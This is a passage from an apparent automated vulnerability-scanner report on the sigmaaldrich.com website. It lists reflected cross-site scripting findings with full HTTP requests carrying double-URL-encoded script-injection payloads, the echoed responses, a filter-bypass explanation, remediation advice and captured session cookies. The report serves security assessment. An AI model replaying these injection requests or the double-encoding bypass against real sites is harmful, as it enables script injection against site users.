Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:03 GMT
Content-Length: 29007
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/life-science66369";alert(1)//24dc9edba80/functional-genomics-and-rnai/shrna/custom-services","E404") ;
   </script>
...[SNIP]...

1.113. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 194be%2522%253balert%25281%2529%252f%252f42d1ed28fc9 was submitted in the REST URL parameter 5. This input was echoed as 194be";alert(1)//42d1ed28fc9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai194be%2522%253balert%25281%2529%252f%252f42d1ed28fc9/shrna/custom-services HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:04 GMT
Content-Length: 29007
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai194be";alert(1)//42d1ed28fc9/shrna/custom-services","E404") ;
   </script>
...[SNIP]...

1.114. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a940b%2522%253balert%25281%2529%252f%252f35484a5d8b1 was submitted in the REST URL parameter 6. This input was echoed as a940b";alert(1)//35484a5d8b1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrnaa940b%2522%253balert%25281%2529%252f%252f35484a5d8b1/custom-services HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:07 GMT
Content-Length: 29007
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrnaa940b";alert(1)//35484a5d8b1/custom-services","E404") ;
   </script>
...[SNIP]...

1.115. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d19f8%2522%253balert%25281%2529%252f%252f3ffeaa9c5f6 was submitted in the REST URL parameter 7. This input was echoed as d19f8";alert(1)//3ffeaa9c5f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 7 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-servicesd19f8%2522%253balert%25281%2529%252f%252f3ffeaa9c5f6 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:09 GMT
Content-Length: 29007
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
ript language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-servicesd19f8";alert(1)//3ffeaa9c5f6","E404") ;
   </script>
...[SNIP]...

1.116. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/life-science-catalog [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/life-science-catalog

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbf39%2522%253balert%25281%2529%252f%252f9d65c2f2df5 was submitted in the REST URL parameter 1. This input was echoed as dbf39";alert(1)//9d65c2f2df5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /contentdbf39%2522%253balert%25281%2529%252f%252f9d65c2f2df5/sigma-aldrich/areas-of-interest/life-science/life-science-catalog HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:54 GMT
Content-Length: 28977
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/contentdbf39";alert(1)//9d65c2f2df5/sigma-aldrich/areas-of-interest/life-science/life-science-catalog","E404") ;
   </script>
...[SNIP]...

1.117. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/life-science-catalog [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/life-science-catalog

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bea4a%2522%253balert%25281%2529%252f%252f269e62f022b was submitted in the REST URL parameter 2. This input was echoed as bea4a";alert(1)//269e62f022b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrichbea4a%2522%253balert%25281%2529%252f%252f269e62f022b/areas-of-interest/life-science/life-science-catalog HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
